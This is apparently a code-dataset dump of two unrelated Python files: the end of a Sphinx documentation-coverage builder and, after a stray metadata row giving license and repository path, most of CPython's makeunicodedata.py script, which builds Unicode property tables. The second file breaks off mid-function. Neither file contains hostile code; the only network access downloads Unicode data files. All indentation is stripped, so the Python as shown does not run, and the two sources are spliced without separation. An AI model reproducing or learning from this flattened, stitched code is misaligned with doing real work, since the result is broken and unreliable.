def build_py_coverage(self):
objects = self.env.domaindata['py']['objects']
modules = self.env.domaindata['py']['modules']
skip_undoc = self.config.coverage_skip_undoc_in_source
for mod_name in modules:
ignore = False
for exp in self.mod_ignorexps:
if exp.match(mod_name):
ignore = True
break
if ignore:
continue
try:
mod = __import__(mod_name, fromlist=['foo'])
except ImportError, err:
self.warn('module %s could not be imported: %s' %
(mod_name, err))
self.py_undoc[mod_name] = {'error': err}
continue
funcs = []
classes = {}
for name, obj in inspect.getmembers(mod):
# diverse module attributes are ignored:
if name[0] == '_':
# begins in an underscore
continue
if not hasattr(obj, '__module__'):
# cannot be attributed to a module
continue
if obj.__module__ != mod_name:
# is not defined in this module
continue
full_name = '%s.%s' % (mod_name, name)
if inspect.isfunction(obj):
if full_name not in objects:
for exp in self.fun_ignorexps:
if exp.match(name):
break
else:
if skip_undoc and not obj.__doc__:
continue
funcs.append(name)
elif inspect.isclass(obj):
for exp in self.cls_ignorexps:
if exp.match(name):
break
else:
if full_name not in objects:
if skip_undoc and not obj.__doc__:
continue
# not documented at all
classes[name] = []
continue
attrs = []
for attr_name in dir(obj):
if attr_name not in obj.__dict__:
continue
attr = getattr(obj, attr_name)
if not (inspect.ismethod(attr) or
inspect.isfunction(attr)):
continue
if attr_name[0] == '_':
# starts with an underscore, ignore it
continue
if skip_undoc and not attr.__doc__:
# skip methods without docstring if wished
continue
full_attr_name = '%s.%s' % (full_name, attr_name)
if full_attr_name not in objects:
attrs.append(attr_name)
if attrs:
# some attributes are undocumented
classes[name] = attrs
self.py_undoc[mod_name] = {'funcs': funcs, 'classes': classes}
def write_py_coverage(self):
output_file = path.join(self.outdir, 'python.txt')
op = open(output_file, 'w')
failed = []
try:
if self.config.coverage_write_headline:
write_header(op, 'Undocumented Python objects', '=')
keys = self.py_undoc.keys()
keys.sort()
for name in keys:
undoc = self.py_undoc[name]
if 'error' in undoc:
failed.append((name, undoc['error']))
else:
if not undoc['classes'] and not undoc['funcs']:
continue
write_header(op, name)
if undoc['funcs']:
op.write('Functions:\n')
op.writelines(' * %s\n' % x for x in undoc['funcs'])
op.write('\n')
if undoc['classes']:
op.write('Classes:\n')
for name, methods in sorted(
undoc['classes'].iteritems()):
if not methods:
op.write(' * %s\n' % name)
else:
op.write(' * %s -- missing methods:\n\n' % name)
op.writelines(' - %s\n' % x for x in methods)
op.write('\n')
if failed:
write_header(op, 'Modules that failed to import')
op.writelines(' * %s -- %s\n' % x for x in failed)
finally:
op.close()
def finish(self):
# dump the coverage data to a pickle file too
picklepath = path.join(self.outdir, 'undoc.pickle')
dumpfile = open(picklepath, 'wb')
try:
pickle.dump((self.py_undoc, self.c_undoc), dumpfile)
finally:
dumpfile.close()
def setup(app):
app.add_builder(CoverageBuilder)
app.add_config_value('coverage_ignore_modules', [], False)
app.add_config_value('coverage_ignore_functions', [], False)
app.add_config_value('coverage_ignore_classes', [], False)
app.add_config_value('coverage_c_path', [], False)
app.add_config_value('coverage_c_regexes', {}, False)
app.add_config_value('coverage_ignore_c_items', {}, False)
app.add_config_value('coverage_write_headline', True, False)
app.add_config_value('coverage_skip_undoc_in_source', False, False)
| cc0-1.0 |
nikhilprathapani/python-for-android | python3-alpha/python3-src/Tools/unicode/makeunicodedata.py | 47 | 40714 | #
# (re)generate unicode property and type databases
#
# this script converts a unicode 3.2 database file to
# Modules/unicodedata_db.h, Modules/unicodename_db.h,
# and Objects/unicodetype_db.h
#
# history:
# 2000-09-24 fl created (based on bits and pieces from unidb)
# 2000-09-25 fl merged tim's splitbin fixes, separate decomposition table
# 2000-09-25 fl added character type table
# 2000-09-26 fl added LINEBREAK, DECIMAL, and DIGIT flags/fields (2.0)
# 2000-11-03 fl expand first/last ranges
# 2001-01-19 fl added character name tables (2.1)
# 2001-01-21 fl added decomp compression; dynamic phrasebook threshold
# 2002-09-11 wd use string methods
# 2002-10-18 mvl update to Unicode 3.2
# 2002-10-22 mvl generate NFC tables
# 2002-11-24 mvl expand all ranges, sort names version-independently
# 2002-11-25 mvl add UNIDATA_VERSION
# 2004-05-29 perky add east asian width information
# 2006-03-10 mvl update to Unicode 4.1; add UCD 3.2 delta
# 2008-06-11 gb add PRINTABLE_MASK for Atsuo Ishimoto's ascii() patch
#
# written by Fredrik Lundh (fredrik@pythonware.com)
#
import sys, os, zipfile
SCRIPT = sys.argv[0]
VERSION = "3.2"
# The Unicode Database
UNIDATA_VERSION = "6.0.0"
UNICODE_DATA = "UnicodeData%s.txt"
COMPOSITION_EXCLUSIONS = "CompositionExclusions%s.txt"
EASTASIAN_WIDTH = "EastAsianWidth%s.txt"
UNIHAN = "Unihan%s.zip"
DERIVED_CORE_PROPERTIES = "DerivedCoreProperties%s.txt"
DERIVEDNORMALIZATION_PROPS = "DerivedNormalizationProps%s.txt"
LINE_BREAK = "LineBreak%s.txt"
old_versions = ["3.2.0"]
CATEGORY_NAMES = [ "Cn", "Lu", "Ll", "Lt", "Mn", "Mc", "Me", "Nd",
"Nl", "No", "Zs", "Zl", "Zp", "Cc", "Cf", "Cs", "Co", "Cn", "Lm",
"Lo", "Pc", "Pd", "Ps", "Pe", "Pi", "Pf", "Po", "Sm", "Sc", "Sk",
"So" ]
BIDIRECTIONAL_NAMES = [ "", "L", "LRE", "LRO", "R", "AL", "RLE", "RLO",
"PDF", "EN", "ES", "ET", "AN", "CS", "NSM", "BN", "B", "S", "WS",
"ON" ]
EASTASIANWIDTH_NAMES = [ "F", "H", "W", "Na", "A", "N" ]
MANDATORY_LINE_BREAKS = [ "BK", "CR", "LF", "NL" ]
# note: should match definitions in Objects/unicodectype.c
ALPHA_MASK = 0x01
DECIMAL_MASK = 0x02
DIGIT_MASK = 0x04
LOWER_MASK = 0x08
LINEBREAK_MASK = 0x10
SPACE_MASK = 0x20
TITLE_MASK = 0x40
UPPER_MASK = 0x80
XID_START_MASK = 0x100
XID_CONTINUE_MASK = 0x200
PRINTABLE_MASK = 0x400
NODELTA_MASK = 0x800
NUMERIC_MASK = 0x1000
# these ranges need to match unicodedata.c:is_unified_ideograph
cjk_ranges = [
('3400', '4DB5'),
('4E00', '9FCB'),
('20000', '2A6D6'),
('2A700', '2B734'),
('2B740', '2B81D')
]
def maketables(trace=0):
print("--- Reading", UNICODE_DATA % "", "...")
version = ""
unicode = UnicodeData(UNIDATA_VERSION)
print(len(list(filter(None, unicode.table))), "characters")
for version in old_versions:
print("--- Reading", UNICODE_DATA % ("-"+version), "...")
old_unicode = UnicodeData(version, cjk_check=False)
print(len(list(filter(None, old_unicode.table))), "characters")
merge_old_version(version, unicode, old_unicode)
makeunicodename(unicode, trace)
makeunicodedata(unicode, trace)
makeunicodetype(unicode, trace)
# --------------------------------------------------------------------
# unicode character properties
def makeunicodedata(unicode, trace):
dummy = (0, 0, 0, 0, 0, 0)
table = [dummy]
cache = {0: dummy}
index = [0] * len(unicode.chars)
FILE = "Modules/unicodedata_db.h"
print("--- Preparing", FILE, "...")
# 1) database properties
for char in unicode.chars:
record = unicode.table[char]
if record:
# extract database properties
category = CATEGORY_NAMES.index(record[2])
combining = int(record[3])
bidirectional = BIDIRECTIONAL_NAMES.index(record[4])
mirrored = record[9] == "Y"
eastasianwidth = EASTASIANWIDTH_NAMES.index(record[15])
normalizationquickcheck = record[17]
item = (
category, combining, bidirectional, mirrored, eastasianwidth,
normalizationquickcheck
)
# add entry to index and item tables
i = cache.get(item)
if i is None:
cache[item] = i = len(table)
table.append(item)
index[char] = i
# 2) decomposition data
decomp_data = [0]
decomp_prefix = [""]
decomp_index = [0] * len(unicode.chars)
decomp_size = 0
comp_pairs = []
comp_first = [None] * len(unicode.chars)
comp_last = [None] * len(unicode.chars)
for char in unicode.chars:
record = unicode.table[char]
if record:
if record[5]:
decomp = record[5].split()
if len(decomp) > 19:
raise Exception("character %x has a decomposition too large for nfd_nfkd" % char)
# prefix
if decomp[0][0] == "<":
prefix = decomp.pop(0)
else:
prefix = ""
try:
i = decomp_prefix.index(prefix)
except ValueError:
i = len(decomp_prefix)
decomp_prefix.append(prefix)
prefix = i
assert prefix < 256
# content
decomp = [prefix + (len(decomp)<<8)] + [int(s, 16) for s in decomp]
# Collect NFC pairs
if not prefix and len(decomp) == 3 and \
char not in unicode.exclusions and \
unicode.table[decomp[1]][3] == "0":
p, l, r = decomp
comp_first[l] = 1
comp_last[r] = 1
comp_pairs.append((l,r,char))
try:
i = decomp_data.index(decomp)
except ValueError:
i = len(decomp_data)
decomp_data.extend(decomp)
decomp_size = decomp_size + len(decomp) * 2
else:
i = 0
decomp_index[char] = i
f = l = 0
comp_first_ranges = []
comp_last_ranges = []
prev_f = prev_l = None
for i in unicode.chars:
if comp_first[i] is not None:
comp_first[i] = f
f += 1
if prev_f is None:
prev_f = (i,i)
elif prev_f[1]+1 == i:
prev_f = prev_f[0],i
else:
comp_first_ranges.append(prev_f)
prev_f = (i,i)
if comp_last[i] is not None:
comp_last[i] = l
l += 1
if prev_l is None:
prev_l = (i,i)
elif prev_l[1]+1 == i:
prev_l = prev_l[0],i
else:
comp_last_ranges.append(prev_l)
prev_l = (i,i)
comp_first_ranges.append(prev_f)
comp_last_ranges.append(prev_l)
total_first = f
total_last = l
comp_data = [0]*(total_first*total_last)
for f,l,char in comp_pairs:
f = comp_first[f]
l = comp_last[l]
comp_data[f*total_last+l] = char
print(len(table), "unique properties")
print(len(decomp_prefix), "unique decomposition prefixes")
print(len(decomp_data), "unique decomposition entries:", end=' ')
print(decomp_size, "bytes")
print(total_first, "first characters in NFC")
print(total_last, "last characters in NFC")
print(len(comp_pairs), "NFC pairs")
print("--- Writing", FILE, "...")
fp = open(FILE, "w")
print("/* this file was generated by %s %s */" % (SCRIPT, VERSION), file=fp)
print(file=fp)
print('#define UNIDATA_VERSION "%s"' % UNIDATA_VERSION, file=fp)
print("/* a list of unique database records */", file=fp)
print("const _PyUnicode_DatabaseRecord _PyUnicode_Database_Records[] = {", file=fp)
for item in table:
print(" {%d, %d, %d, %d, %d, %d}," % item, file=fp)
print("};", file=fp)
print(file=fp)
print("/* Reindexing of NFC first characters. */", file=fp)
print("#define TOTAL_FIRST",total_first, file=fp)
print("#define TOTAL_LAST",total_last, file=fp)
print("struct reindex{int start;short count,index;};", file=fp)
print("static struct reindex nfc_first[] = {", file=fp)
for start,end in comp_first_ranges:
print(" { %d, %d, %d}," % (start,end-start,comp_first[start]), file=fp)
print(" {0,0,0}", file=fp)
print("};\n", file=fp)
print("static struct reindex nfc_last[] = {", file=fp)
for start,end in comp_last_ranges:
print(" { %d, %d, %d}," % (start,end-start,comp_last[start]), file=fp)
print(" {0,0,0}", file=fp)
print("};\n", file=fp)
# FIXME: <fl> the following tables could be made static, and
# the support code moved into unicodedatabase.c
print("/* string literals */", file=fp)
print("const char *_PyUnicode_CategoryNames[] = {", file=fp)
for name in CATEGORY_NAMES:
print(" \"%s\"," % name, file=fp)
print(" NULL", file=fp)
print("};", file=fp)
print("const char *_PyUnicode_BidirectionalNames[] = {", file=fp)
for name in BIDIRECTIONAL_NAMES:
print(" \"%s\"," % name, file=fp)
print(" NULL", file=fp)
print("};", file=fp)
print("const char *_PyUnicode_EastAsianWidthNames[] = {", file=fp)
for name in EASTASIANWIDTH_NAMES:
print(" \"%s\"," % name, file=fp)
print(" NULL", file=fp)
print("};", file=fp)
print("static const char *decomp_prefix[] = {", file=fp)
for name in decomp_prefix:
print(" \"%s\"," % name, file=fp)
print(" NULL", file=fp)
print("};", file=fp)
# split record index table
index1, index2, shift = splitbins(index, trace)
print("/* index tables for the database records */", file=fp)
print("#define SHIFT", shift, file=fp)
Array("index1", index1).dump(fp, trace)
Array("index2", index2).dump(fp, trace)
# split decomposition index table
index1, index2, shift = splitbins(decomp_index, trace)
print("/* decomposition data */", file=fp)
Array("decomp_data", decomp_data).dump(fp, trace)
print("/* index tables for the decomposition data */", file=fp)
print("#define DECOMP_SHIFT", shift, file=fp)
Array("decomp_index1", index1).dump(fp, trace)
Array("decomp_index2", index2).dump(fp, trace)
index, index2, shift = splitbins(comp_data, trace)
print("/* NFC pairs */", file=fp)
print("#define COMP_SHIFT", shift, file=fp)
Array("comp_index", index).dump(fp, trace)
Array("comp_data", index2).dump(fp, trace)
# Generate delta tables for old versions
for version, table, normalization in unicode.changed:
cversion = version.replace(".","_")
records = [table[0]]
cache = {table[0]:0}
index = [0] * len(table)
for i, record in enumerate(table):
try:
index[i] = cache[record]
except KeyError:
index[i] = cache[record] = len(records)
records.append(record)
index1, index2, shift = splitbins(index, trace)
print("static const change_record change_records_%s[] = {" % cversion, file=fp)
for record in records:
print("\t{ %s }," % ", ".join(map(str,record)), file=fp)
print("};", file=fp)
Array("changes_%s_index" % cversion, index1).dump(fp, trace)
Array("changes_%s_data" % cversion, index2).dump(fp, trace)
print("static const change_record* get_change_%s(Py_UCS4 n)" % cversion, file=fp)
print("{", file=fp)
print("\tint index;", file=fp)
print("\tif (n >= 0x110000) index = 0;", file=fp)
print("\telse {", file=fp)
print("\t\tindex = changes_%s_index[n>>%d];" % (cversion, shift), file=fp)
print("\t\tindex = changes_%s_data[(index<<%d)+(n & %d)];" % \
(cversion, shift, ((1<<shift)-1)), file=fp)
print("\t}", file=fp)
print("\treturn change_records_%s+index;" % cversion, file=fp)
print("}\n", file=fp)
print("static Py_UCS4 normalization_%s(Py_UCS4 n)" % cversion, file=fp)
print("{", file=fp)
print("\tswitch(n) {", file=fp)
for k, v in normalization:
print("\tcase %s: return 0x%s;" % (hex(k), v), file=fp)
print("\tdefault: return 0;", file=fp)
print("\t}\n}\n", file=fp)
fp.close()
# --------------------------------------------------------------------
# unicode character type tables
def makeunicodetype(unicode, trace):
FILE = "Objects/unicodetype_db.h"
print("--- Preparing", FILE, "...")
# extract unicode types
dummy = (0, 0, 0, 0, 0, 0)
table = [dummy]
cache = {0: dummy}
index = [0] * len(unicode.chars)
numeric = {}
spaces = []
linebreaks = []
for char in unicode.chars:
record = unicode.table[char]
if record:
# extract database properties
category = record[2]
bidirectional = record[4]
properties = record[16]
flags = 0
delta = True
if category in ["Lm", "Lt", "Lu", "Ll", "Lo"]:
flags |= ALPHA_MASK
if category == "Ll":
flags |= LOWER_MASK
if 'Line_Break' in properties or bidirectional == "B":
flags |= LINEBREAK_MASK
linebreaks.append(char)
if category == "Zs" or bidirectional in ("WS", "B", "S"):
flags |= SPACE_MASK
spaces.append(char)
if category == "Lt":
flags |= TITLE_MASK
if category == "Lu":
flags |= UPPER_MASK
if char == ord(" ") or category[0] not in ("C", "Z"):
flags |= PRINTABLE_MASK
if "XID_Start" in properties:
flags |= XID_START_MASK
if "XID_Continue" in properties:
flags |= XID_CONTINUE_MASK
# use delta predictor for upper/lower/title if it fits
if record[12]:
upper = int(record[12], 16)
else:
upper = char
if record[13]:
lower = int(record[13], 16)
else:
lower = char
if record[14]:
title = int(record[14], 16)
else:
# UCD.html says that a missing title char means that
# it defaults to the uppercase character, not to the
# character itself. Apparently, in the current UCD (5.x)
# this feature is never used
title = upper
upper_d = upper - char
lower_d = lower - char
title_d = title - char
if -32768 <= upper_d <= 32767 and \
-32768 <= lower_d <= 32767 and \
-32768 <= title_d <= 32767:
# use deltas
upper = upper_d & 0xffff
lower = lower_d & 0xffff
title = title_d & 0xffff
else:
flags |= NODELTA_MASK
# decimal digit, integer digit
decimal = 0
if record[6]:
flags |= DECIMAL_MASK
decimal = int(record[6])
digit = 0
if record[7]:
flags |= DIGIT_MASK
digit = int(record[7])
if record[8]:
flags |= NUMERIC_MASK
numeric.setdefault(record[8], []).append(char)
item = (
upper, lower, title, decimal, digit, flags
)
# add entry to index and item tables
i = cache.get(item)
if i is None:
cache[item] = i = len(table)
table.append(item)
index[char] = i
print(len(table), "unique character type entries")
print(sum(map(len, numeric.values())), "numeric code points")
print(len(spaces), "whitespace code points")
print(len(linebreaks), "linebreak code points")
print("--- Writing", FILE, "...")
fp = open(FILE, "w")
print("/* this file was generated by %s %s */" % (SCRIPT, VERSION), file=fp)
print(file=fp)
print("/* a list of unique character type descriptors */", file=fp)
print("const _PyUnicode_TypeRecord _PyUnicode_TypeRecords[] = {", file=fp)
for item in table:
print(" {%d, %d, %d, %d, %d, %d}," % item, file=fp)
print("};", file=fp)
print(file=fp)
# split decomposition index table
index1, index2, shift = splitbins(index, trace)
print("/* type indexes */", file=fp)
print("#define SHIFT", shift, file=fp)
Array("index1", index1).dump(fp, trace)
Array("index2", index2).dump(fp, trace)
# Generate code for _PyUnicode_ToNumeric()
numeric_items = sorted(numeric.items())
print('/* Returns the numeric value as double for Unicode characters', file=fp)
print(' * having this property, -1.0 otherwise.', file=fp)
print(' */', file=fp)
print('double _PyUnicode_ToNumeric(Py_UCS4 ch)', file=fp)
print('{', file=fp)
print(' switch (ch) {', file=fp)
for value, codepoints in numeric_items:
# Turn text into float literals
parts = value.split('/')
parts = [repr(float(part)) for part in parts]
value = '/'.join(parts)
codepoints.sort()
for codepoint in codepoints:
print(' case 0x%04X:' % (codepoint,), file=fp)
print(' return (double) %s;' % (value,), file=fp)
print(' }', file=fp)
print(' return -1.0;', file=fp)
print('}', file=fp)
print(file=fp)
# Generate code for _PyUnicode_IsWhitespace()
print("/* Returns 1 for Unicode characters having the bidirectional", file=fp)
print(" * type 'WS', 'B' or 'S' or the category 'Zs', 0 otherwise.", file=fp)
print(" */", file=fp)
print('int _PyUnicode_IsWhitespace(register const Py_UCS4 ch)', file=fp)
print('{', file=fp)
print(' switch (ch) {', file=fp)
for codepoint in sorted(spaces):
print(' case 0x%04X:' % (codepoint,), file=fp)
print(' return 1;', file=fp)
print(' }', file=fp)
print(' return 0;', file=fp)
print('}', file=fp)
print(file=fp)
# Generate code for _PyUnicode_IsLinebreak()
print("/* Returns 1 for Unicode characters having the line break", file=fp)
print(" * property 'BK', 'CR', 'LF' or 'NL' or having bidirectional", file=fp)
print(" * type 'B', 0 otherwise.", file=fp)
print(" */", file=fp)
print('int _PyUnicode_IsLinebreak(register const Py_UCS4 ch)', file=fp)
print('{', file=fp)
print(' switch (ch) {', file=fp)
for codepoint in sorted(linebreaks):
print(' case 0x%04X:' % (codepoint,), file=fp)
print(' return 1;', file=fp)
print(' }', file=fp)
print(' return 0;', file=fp)
print('}', file=fp)
print(file=fp)
fp.close()
# --------------------------------------------------------------------
# unicode name database
def makeunicodename(unicode, trace):
FILE = "Modules/unicodename_db.h"
print("--- Preparing", FILE, "...")
# collect names
names = [None] * len(unicode.chars)
for char in unicode.chars:
record = unicode.table[char]
if record:
name = record[1].strip()
if name and name[0] != "<":
names[char] = name + chr(0)
print(len(list(n for n in names if n is not None)), "distinct names")
# collect unique words from names (note that we differ between
# words inside a sentence, and words ending a sentence. the
# latter includes the trailing null byte.
words = {}
n = b = 0
for char in unicode.chars:
name = names[char]
if name:
w = name.split()
b = b + len(name)
n = n + len(w)
for w in w:
l = words.get(w)
if l:
l.append(None)
else:
words[w] = [len(words)]
print(n, "words in text;", b, "bytes")
wordlist = list(words.items())
# sort on falling frequency, then by name
def word_key(a):
aword, alist = a
return -len(alist), aword
wordlist.sort(key=word_key)
# figure out how many phrasebook escapes we need
escapes = 0
while escapes * 256 < len(wordlist):
escapes = escapes + 1
print(escapes, "escapes")
short = 256 - escapes
assert short > 0
print(short, "short indexes in lexicon")
# statistics
n = 0
for i in range(short):
n = n + len(wordlist[i][1])
print(n, "short indexes in phrasebook")
# pick the most commonly used words, and sort the rest on falling
# length (to maximize overlap)
wordlist, wordtail = wordlist[:short], wordlist[short:]
wordtail.sort(key=lambda a: a[0], reverse=True)
wordlist.extend(wordtail)
# generate lexicon from words
lexicon_offset = [0]
lexicon = ""
words = {}
# build a lexicon string
offset = 0
for w, x in wordlist:
# encoding: bit 7 indicates last character in word (chr(128)
# indicates the last character in an entire string)
ww = w[:-1] + chr(ord(w[-1])+128)
# reuse string tails, when possible
o = lexicon.find(ww)
if o < 0:
o = offset
lexicon = lexicon + ww
offset = offset + len(w)
words[w] = len(lexicon_offset)
lexicon_offset.append(o)
lexicon = list(map(ord, lexicon))
# generate phrasebook from names and lexicon
phrasebook = [0]
phrasebook_offset = [0] * len(unicode.chars)
for char in unicode.chars:
name = names[char]
if name:
w = name.split()
phrasebook_offset[char] = len(phrasebook)
for w in w:
i = words[w]
if i < short:
phrasebook.append(i)
else:
# store as two bytes
phrasebook.append((i>>8) + short)
phrasebook.append(i&255)
assert getsize(phrasebook) == 1
#
# unicode name hash table
# extract names
data = []
for char in unicode.chars:
record = unicode.table[char]
if record:
name = record[1].strip()
if name and name[0] != "<":
data.append((name, char))
# the magic number 47 was chosen to minimize the number of
# collisions on the current data set. if you like, change it
# and see what happens...
codehash = Hash("code", data, 47)
print("--- Writing", FILE, "...")
fp = open(FILE, "w")
print("/* this file was generated by %s %s */" % (SCRIPT, VERSION), file=fp)
print(file=fp)
print("#define NAME_MAXLEN", 256, file=fp)
print(file=fp)
print("/* lexicon */", file=fp)
Array("lexicon", lexicon).dump(fp, trace)
Array("lexicon_offset", lexicon_offset).dump(fp, trace)
# split decomposition index table
offset1, offset2, shift = splitbins(phrasebook_offset, trace)
print("/* code->name phrasebook */", file=fp)
print("#define phrasebook_shift", shift, file=fp)
print("#define phrasebook_short", short, file=fp)
Array("phrasebook", phrasebook).dump(fp, trace)
Array("phrasebook_offset1", offset1).dump(fp, trace)
Array("phrasebook_offset2", offset2).dump(fp, trace)
print("/* name->code dictionary */", file=fp)
codehash.dump(fp, trace)
fp.close()
def merge_old_version(version, new, old):
# Changes to exclusion file not implemented yet
if old.exclusions != new.exclusions:
raise NotImplementedError("exclusions differ")
# In these change records, 0xFF means "no change"
bidir_changes = [0xFF]*0x110000
category_changes = [0xFF]*0x110000
decimal_changes = [0xFF]*0x110000
mirrored_changes = [0xFF]*0x110000
# In numeric data, 0 means "no change",
# -1 means "did not have a numeric value
numeric_changes = [0] * 0x110000
# normalization_changes is a list of key-value pairs
normalization_changes = []
for i in range(0x110000):
if new.table[i] is None:
# Characters unassigned in the new version ought to
# be unassigned in the old one
assert old.table[i] is None
continue
# check characters unassigned in the old version
if old.table[i] is None:
# category 0 is "unassigned"
category_changes[i] = 0
continue
# check characters that differ
if old.table[i] != new.table[i]:
for k in range(len(old.table[i])):
if old.table[i][k] != new.table[i][k]:
value = old.table[i][k]
if k == 2:
#print "CATEGORY",hex(i), old.table[i][k], new.table[i][k]
category_changes[i] = CATEGORY_NAMES.index(value)
elif k == 4:
#print "BIDIR",hex(i), old.table[i][k], new.table[i][k]
bidir_changes[i] = BIDIRECTIONAL_NAMES.index(value)
elif k == 5:
#print "DECOMP",hex(i), old.table[i][k], new.table[i][k]
# We assume that all normalization changes are in 1:1 mappings
assert " " not in value
normalization_changes.append((i, value))
elif k == 6:
#print "DECIMAL",hex(i), old.table[i][k], new.table[i][k]
# we only support changes where the old value is a single digit
assert value in "0123456789"
decimal_changes[i] = int(value)
elif k == 8:
# print "NUMERIC",hex(i), `old.table[i][k]`, new.table[i][k]
# Since 0 encodes "no change", the old value is better not 0
if not value:
numeric_changes[i] = -1
else:
numeric_changes[i] = float(value)
assert numeric_changes[i] not in (0, -1)
elif k == 9:
if value == 'Y':
mirrored_changes[i] = '1'
else:
mirrored_changes[i] = '0'
elif k == 11:
# change to ISO comment, ignore
pass
elif k == 12:
# change to simple uppercase mapping; ignore
pass
elif k == 13:
# change to simple lowercase mapping; ignore
pass
elif k == 14:
# change to simple titlecase mapping; ignore
pass
elif k == 16:
# derived property changes; not yet
pass
elif k == 17:
# normalization quickchecks are not performed
# for older versions
pass
else:
class Difference(Exception):pass
raise Difference(hex(i), k, old.table[i], new.table[i])
new.changed.append((version, list(zip(bidir_changes, category_changes,
decimal_changes, mirrored_changes,
numeric_changes)),
normalization_changes))
def open_data(template, version):
local = template % ('-'+version,)
if not os.path.exists(local):
import urllib.request
if version == '3.2.0':
# irregular url structure
url = 'http://www.unicode.org/Public/3.2-Update/' + local
else:
url = ('http://www.unicode.org/Public/%s/ucd/'+template) % (version, '')
urllib.request.urlretrieve(url, filename=local)
if local.endswith('.txt'):
return open(local, encoding='utf-8')
else:
# Unihan.zip
return open(local, 'rb')
# --------------------------------------------------------------------
# the following support code is taken from the unidb utilities
# Copyright (c) 1999-2000 by Secret Labs AB
# load a unicode-data file from disk
class UnicodeData:
# Record structure:
# [ID, name, category, combining, bidi, decomp, (6)
# decimal, digit, numeric, bidi-mirrored, Unicode-1-name, (11)
# ISO-comment, uppercase, lowercase, titlecase, ea-width, (16)
# derived-props] (17)
def __init__(self, version,
linebreakprops=False,
expand=1,
cjk_check=True):
self.changed = []
file = open_data(UNICODE_DATA, version)
table = [None] * 0x110000
while 1:
s = file.readline()
if not s:
break
s = s.strip().split(";")
char = int(s[0], 16)
table[char] = s
cjk_ranges_found = []
# expand first-last ranges
if expand:
field = None
for i in range(0, 0x110000):
s = table[i]
if s:
if s[1][-6:] == "First>":
s[1] = ""
field = s
elif s[1][-5:] == "Last>":
if s[1].startswith("<CJK Ideograph"):
cjk_ranges_found.append((field[0],
s[0]))
s[1] = ""
field = None
elif field:
f2 = field[:]
f2[0] = "%X" % i
table[i] = f2
if cjk_check and cjk_ranges != cjk_ranges_found:
raise ValueError("CJK ranges deviate: have %r" % cjk_ranges_found)
# public attributes
self.filename = UNICODE_DATA % ''
self.table = table
self.chars = list(range(0x110000)) # unicode 3.2
file = open_data(COMPOSITION_EXCLUSIONS, version)
self.exclusions = {}
for s in file:
s = s.strip()
if not s:
continue
if s[0] == '#':
continue
char = int(s.split()[0],16)
self.exclusions[char] = 1
widths = [None] * 0x110000
for s in open_data(EASTASIAN_WIDTH, version):
s = s.strip()
if not s:
continue
if s[0] == '#':
continue
s = s.split()[0].split(';')
if '..' in s[0]:
first, last = [int(c, 16) for c in s[0].split('..')]
chars = list(range(first, last+1))
else:
chars = [int(s[0], 16)]
for char in chars:
widths[char] = s[1]
for i in range(0, 0x110000):
if table[i] is not None:
table[i].append(widths[i])
for i in range(0, 0x110000):
if table[i] is not None:
table[i].append(set())
for s in open_data(DERIVED_CORE_PROPERTIES, version):
s = s.split('#', 1)[0].strip()
if not s:
continue
r, p = s.split(";")
r = r.strip()
p = p.strip()
if ".." in r:
first, last = [int(c, 16) for c in r.split('..')]
chars = list(range(first, last+1))
else:
chars = [int(r, 16)]
for char in chars:
if table[char]:
# Some properties (e.g. Default_Ignorable_Code_Point)
# apply to unassigned code points; ignore them
table[char][-1].add(p)
for s in open_data(LINE_BREAK, version):
s = s.partition('#')[0]
s = [i.strip() for i in s.split(';')]
if len(s) < 2 or s[1] not in MANDATORY_LINE_BREAKS:
continue
if '..' not in s[0]:
first = last = int(s[0], 16)
else:
first, last = [int(c, 16) for c in s[0].split('..')]
for char in range(first, last+1):
table[char][-1].add('Line_Break')
# We only want the quickcheck properties
# Format: NF?_QC; Y(es)/N(o)/M(aybe)
# Yes is the default, hence only N and M occur
# In 3.2.0, the format was different (NF?_NO)
# The parsing will incorrectly determine these as
# "yes", however, unicodedata.c will not perform quickchecks
# for older versions, and no delta records will be created.
quickchecks = [0] * 0x110000
qc_order = 'NFD_QC NFKD_QC NFC_QC NFKC_QC'.split()
for s in open_data(DERIVEDNORMALIZATION_PROPS, version):
if '#' in s:
s = s[:s.index('#')]
s = [i.strip() for i in s.split(';')]
if len(s) < 2 or s[1] not in qc_order:
continue
quickcheck = 'MN'.index(s[2]) + 1 # Maybe or No
quickcheck_shift = qc_order.index(s[1])*2
quickcheck <<= quickcheck_shift
if '..' not in s[0]:
first = last = int(s[0], 16)
else:
first, last = [int(c, 16) for c in s[0].split('..')]
for char in range(first, last+1):
assert not (quickchecks[char]>>quickcheck_shift)&3
quickchecks[char] |= quickcheck
for i in range(0, 0x110000):
if table[i] is not None:
table[i].append(quickchecks[i])
zip = zipfile.ZipFile(open_data(UNIHAN, version))
if version == '3.2.0':
data = zip.open('Unihan-3.2.0.txt').read()
else:
data = zip.open('Unihan_NumericValues.txt').read()
for line in data.decode("utf-8").splitlines():
if not line.startswith('U+'):
continue
code, tag, value = line.split(None, 3)[:3]
if tag not in ('kAccountingNumeric', 'kPrimaryNumeric',
'kOtherNumeric'):
continue
value = value.strip().replace(',', '')
i = int(code[2:], 16)
# Patch the numeric field
if table[i] is not None:
table[i][8] = value
def uselatin1(self):
# restrict character range to ISO Latin 1
self.chars = list(range(256))
# hash table tools
# this is a straight-forward reimplementation of Python's built-in
# dictionary type, using a static data structure, and a custom string
# hash algorithm.
def myhash(s, magic):
h = 0
for c in map(ord, s.upper()):
h = (h * magic) + c
ix = h & 0xff000000
if ix:
h = (h ^ ((ix>>24) & 0xff)) & 0x00ffffff
return h
SIZES = [
(4,3), (8,3), (16,3), (32,5), (64,3), (128,3), (256,29), (512,17),
(1024,9), (2048,5), (4096,83), (8192,27), (16384,43), (32768,3),
(65536,45), (131072,9), (262144,39), (524288,39), (1048576,9),
(2097152,5), (4194304,3), (8388608,33), (16777216,27)
]
class Hash:
def __init__(self, name, data, magic):
# turn a (key, value) list into a static hash table structure
# determine table size
for size, poly in SIZES:
if size > len(data):
poly = size + poly
break
else:
raise AssertionError("ran out of polynomials")
print(size, "slots in hash table")
table = [None] * size
mask = size-1
n = 0
hash = myhash
# initialize hash table
for key, value in data:
h = hash(key, magic)
i = (~h) & mask
v = table[i]
if v is None:
table[i] = value
continue
incr = (h ^ (h >> 3)) & mask;
if not incr:
incr = mask
while 1:
n = n + 1
i = (i + incr) & mask
v = table[i]
if v is None:
table[i] = value
break
incr = incr << 1
if incr > mask:
incr = incr ^ poly
print(n, "collisions")
self.collisions = n
for i in range(len(table)):
if table[i] is None:
table[i] = 0
self.data = Array(name + "_hash", table)
self.magic = magic
self.name = name
self.size = size
self.poly = poly
def dump(self, file, trace):
# write data to file, as a C array
